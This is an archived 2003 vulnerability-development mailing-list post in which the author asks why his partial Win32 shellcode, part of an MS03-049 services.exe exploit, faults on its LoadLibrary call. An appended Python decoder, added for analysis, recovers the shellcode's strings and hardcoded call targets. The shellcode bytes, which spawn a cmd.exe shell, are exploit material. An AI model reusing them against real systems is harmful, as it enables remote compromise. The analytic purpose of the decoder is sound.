Vulnerability Development mailing list archives

Win32 Shellcode question.


From: "Vinay A. Mahadik" <devnull001 () fastmail fm>
Date: Thu, 27 Nov 2003 19:29:18 -0800

I was writing an exploit for the MS03-049 services.exe stack overflow vuln (from scratch for my own academic interest). Here's my shellcode to simply launch a "cmd.exe" shell.

#define LL  0x7C4F05CF
#define SYS 0x78018EBF

char payload[] = {
 0x55,          // push        ebp
 0x8B, 0xEC,    // mov         ebp,esp

 0x33, 0xC0,    // xor         eax,eax
 0x50,          // push        eax
 0x50,          // push        eax
 0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63,
        // mov dword ptr [ebp-8],6376736Dh
 0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74,
        // mov word ptr [ebp-4],7472h
 0x8D, 0x45, 0xF8, // lea eax,[ebp-8]
 0x50,          // push        eax
 0xB8, 0xCF, 0x05, 0x4F, 0x7C,    // mov         eax,LL
 0xFF, 0xD0,    // call        eax <------------ Problem call
 0x8B, 0xE5,    // mov         esp,ebp

 0x33, 0xC0,    // xor         eax,eax
 0x50,          // push        eax
 0x50,          // push        eax
 0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E,
        // mov         dword ptr [ebp-8],2E646D63h
 0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78,
        // mov         word ptr [ebp-4],7865h
 0xC6, 0x45, 0xFE, 0x65,
        // mov         byte ptr [ebp-2],65h
 0x8D, 0x45, 0xF8, // lea      eax,[ebp-8]
 0x50,          // push        eax
 0xB8, 0xBF, 0x8E, 0x01, 0x78,
        // mov         eax,SYS
 0xFF, 0xD0,    // call        eax
...
 };

After the overflow, I can step through the NOP sled, and reach the above payload - meaning I have control over the CPU's exec path, and can make it execute my payload. However, I keep getting an "Access Violation" writing location.. error inside the "call eax" that corresponds with LoadLibrary("msvcrt").

I have confirmed the LL and SYS variables for the target (Win2k SP4). Plus, the payload works just fine when compiled and executed outside of services.exe. Is there something special about services.exe that prevents LoadLibraryA from executing normally, or what did I do wrong? Can you spot anything I am overlooking? The same payload has worked on other stack-overflow exploits, and inside a simple main(){} loop.

Thanks,
Vinay.
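The stack-string construction and the hardcoded-address calls in the post can be checked offline with a small decoder. This is an added example for readers analysing a blob like this one, not code from the original post or from any project. It emulates only the handful of instruction forms the posted bytes use (push/mov/lea/xor/call eax with imm8 frame displacements), assumes an arbitrary constructed frame address of 0x0012FF00, reconstructs the strings the bytes build at [ebp-8], and lists each call target with its string argument. The sample input is the post's own byte sequence up to the second `call eax`; the elided tail is not included.

```python
"""Tiny linear decoder for stack-string shellcode of the style in the post.

It models just enough x86 state (eax, esp, ebp, a sparse byte memory) to
recover the strings written into the frame and the absolute addresses
handed to `call eax`. Anything outside that small opcode set raises, so the
decoder never silently guesses.
"""

# Constructed sample: the payload bytes quoted in the post, up to the
# second `call eax` (the part after the "..." in the post is not included).
PAYLOAD = bytes([
    0x55, 0x8B, 0xEC,
    0x33, 0xC0, 0x50, 0x50,
    0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63,
    0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74,
    0x8D, 0x45, 0xF8, 0x50,
    0xB8, 0xCF, 0x05, 0x4F, 0x7C,
    0xFF, 0xD0,
    0x8B, 0xE5,
    0x33, 0xC0, 0x50, 0x50,
    0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E,
    0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78,
    0xC6, 0x45, 0xFE, 0x65,
    0x8D, 0x45, 0xF8, 0x50,
    0xB8, 0xBF, 0x8E, 0x01, 0x78,
    0xFF, 0xD0,
])

STACK_BASE = 0x0012FF00  # assumption: arbitrary constructed stack address


def s8(b):
    """Interpret one byte as a signed 8-bit displacement."""
    return b - 256 if b > 127 else b


def decode_calls(code, ebp=STACK_BASE):
    """Return [(call_target, first_string_argument), ...] for the blob."""
    mem = {}          # sparse memory: address -> byte
    esp = ebp
    eax = 0
    calls = []
    i = 0

    def write(addr, value, size):
        for k, byte in enumerate(value.to_bytes(size, "little")):
            mem[addr + k] = byte

    def read_dword(addr):
        return int.from_bytes(bytes(mem.get(addr + k, 0) for k in range(4)), "little")

    def cstring(addr):
        out = bytearray()
        while mem.get(addr, 0) != 0:
            out.append(mem[addr])
            addr += 1
        return out.decode("ascii", "replace")

    while i < len(code):
        op = code[i]
        if op == 0x55:                                  # push ebp
            esp -= 4; write(esp, ebp, 4); i += 1
        elif code[i:i + 2] == b"\x8b\xec":              # mov ebp, esp
            ebp = esp; i += 2
        elif code[i:i + 2] == b"\x8b\xe5":              # mov esp, ebp
            esp = ebp; i += 2
        elif code[i:i + 2] == b"\x33\xc0":              # xor eax, eax
            eax = 0; i += 2
        elif op == 0x50:                                # push eax
            esp -= 4; write(esp, eax, 4); i += 1
        elif code[i:i + 2] == b"\xc7\x45":              # mov dword [ebp+disp8], imm32
            write(ebp + s8(code[i + 2]), int.from_bytes(code[i + 3:i + 7], "little"), 4); i += 7
        elif code[i:i + 3] == b"\x66\xc7\x45":          # mov word [ebp+disp8], imm16
            write(ebp + s8(code[i + 3]), int.from_bytes(code[i + 4:i + 6], "little"), 2); i += 6
        elif code[i:i + 2] == b"\xc6\x45":              # mov byte [ebp+disp8], imm8
            write(ebp + s8(code[i + 2]), code[i + 3], 1); i += 4
        elif code[i:i + 2] == b"\x8d\x45":              # lea eax, [ebp+disp8]
            eax = ebp + s8(code[i + 2]); i += 3
        elif op == 0xB8:                                # mov eax, imm32
            eax = int.from_bytes(code[i + 1:i + 5], "little"); i += 5
        elif code[i:i + 2] == b"\xff\xd0":              # call eax
            # First stack argument is the dword at [esp]; treat it as char*.
            calls.append((eax, cstring(read_dword(esp))))
            i += 2
        else:
            raise ValueError(f"unsupported opcode 0x{op:02x} at offset {i}")
    return calls


if __name__ == "__main__":
    for target, arg in decode_calls(PAYLOAD):
        # Absolute targets like these are valid for one OS/service-pack build only.
        print(f"call 0x{target:08X} with string argument {arg!r}")
```

For the bytes in the post the decoder reports two calls, 0x7C4F05CF with "msvcrt" and 0x78018EBF with "cmd.exe", which confirms the string assembly is correct and makes the dependence on two hardcoded, build-specific addresses explicit; a blob that raises on an unsupported opcode needs a full disassembler rather than this shortcut.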

